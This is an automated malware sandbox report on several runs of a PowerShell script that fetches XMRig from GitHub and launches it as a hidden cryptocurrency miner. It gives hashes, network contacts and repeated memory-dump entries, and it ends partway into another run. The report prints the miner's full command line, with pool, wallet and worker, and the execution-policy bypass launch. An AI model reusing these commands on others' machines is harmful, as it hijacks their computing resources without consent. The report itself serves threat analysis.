US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

memory/2168-0-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

memory/2168-1-0x000001C42E7D0000-0x000001C42E7F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3u50vjl.4lv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-11-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/2168-12-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/2168-14-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/2168-15-0x000001C42EC80000-0x000001C42EC92000-memory.dmp

memory/2168-16-0x000001C4159F0000-0x000001C4159FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/456-47-0x000002684CEF0000-0x000002684CF10000-memory.dmp

memory/456-48-0x000002684CF40000-0x000002684CF60000-memory.dmp

memory/456-49-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/2168-51-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

memory/456-50-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/2168-52-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/456-54-0x000002684CF80000-0x000002684CFA0000-memory.dmp

memory/456-53-0x000002684CF60000-0x000002684CF80000-memory.dmp

memory/2168-55-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/456-56-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-58-0x000002684CF60000-0x000002684CF80000-memory.dmp

memory/456-57-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-59-0x000002684CF80000-0x000002684CFA0000-memory.dmp

memory/456-60-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-61-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-62-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-63-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-64-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-65-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-66-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-67-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-68-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-69-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-70-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-71-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-72-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-73-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-74-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-75-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-76-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-77-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-78-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-79-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-80-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-81-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-82-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-83-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-84-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-85-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-86-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-87-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-88-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-89-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-90-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-91-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-92-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-93-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-94-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-95-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-96-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-97-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-98-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-99-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-100-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-101-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-102-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-103-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-104-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-105-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-106-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-107-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-108-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-109-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-110-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-111-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-112-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-113-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-114-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-115-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-116-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-117-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-118-0x00007FF746C10000-0x00007FF747843000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4760-0-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

memory/4760-5-0x00000185420C0000-0x00000185420E2000-memory.dmp

memory/4760-9-0x0000018542270000-0x00000185422E6000-memory.dmp

memory/4760-8-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ha24fpsk.aiu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4760-10-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/4760-25-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/4760-48-0x0000018542250000-0x0000018542262000-memory.dmp

memory/4760-61-0x0000018542240000-0x000001854224A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4140-90-0x000001E723F90000-0x000001E723FB0000-memory.dmp

memory/4140-91-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-92-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4760-93-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

memory/4760-94-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/4140-95-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-96-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-97-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-98-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-99-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-100-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-101-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-102-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-103-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-104-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-105-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-106-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-107-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-108-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-109-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-110-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-111-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-112-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-113-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-114-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-115-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-116-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-117-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-118-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-119-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-120-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-121-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-122-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-123-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-124-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-125-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-126-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-127-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-128-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-129-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-130-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-131-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-132-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-133-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-134-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-135-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-136-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-137-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-138-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-139-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-140-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-141-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-142-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-143-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-144-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-145-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-146-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-147-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-148-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-149-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-150-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-151-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-152-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-153-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-154-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

memory/4140-155-0x00007FF6FAF60000-0x00007FF6FBB93000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:01

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1751s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 201.64.52.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3796-2-0x00007FF8A3943000-0x00007FF8A3944000-memory.dmp

memory/3796-5-0x0000027EB7DF0000-0x0000027EB7E12000-memory.dmp

memory/3796-7-0x00007FF8A3940000-0x00007FF8A432C000-memory.dmp

memory/3796-10-0x00007FF8A3940000-0x00007FF8A432C000-memory.dmp

memory/3796-9-0x0000027ED0590000-0x0000027ED0606000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4a4lgpbm.bd3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3796-25-0x00007FF8A3940000-0x00007FF8A432C000-memory.dmp

memory/3796-48-0x0000027EB7FC0000-0x0000027EB7FD2000-memory.dmp

memory/3796-61-0x0000027EB7FA0000-0x0000027EB7FAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4028-90-0x0000019AB9080000-0x0000019AB90A0000-memory.dmp

memory/4028-91-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-92-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/3796-93-0x00007FF8A3943000-0x00007FF8A3944000-memory.dmp

memory/3796-94-0x00007FF8A3940000-0x00007FF8A432C000-memory.dmp

memory/4028-95-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-96-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-97-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-98-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-99-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-100-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-101-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-102-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-103-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-104-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-105-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-106-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-107-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-108-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-109-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-110-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-111-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-112-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-113-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-114-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-115-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-116-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-117-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-118-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-119-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-120-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-121-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-122-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-123-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-124-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-125-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-126-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-127-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-128-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-129-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-130-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-131-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-132-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-133-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-134-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-135-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-136-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-137-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-138-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-139-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-140-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-141-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-142-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-143-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-144-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-145-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-146-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-147-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-148-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-149-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-150-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-151-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-152-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-153-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-154-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

memory/4028-155-0x00007FF7A1930000-0x00007FF7A2563000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:03

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1795s

Command Line

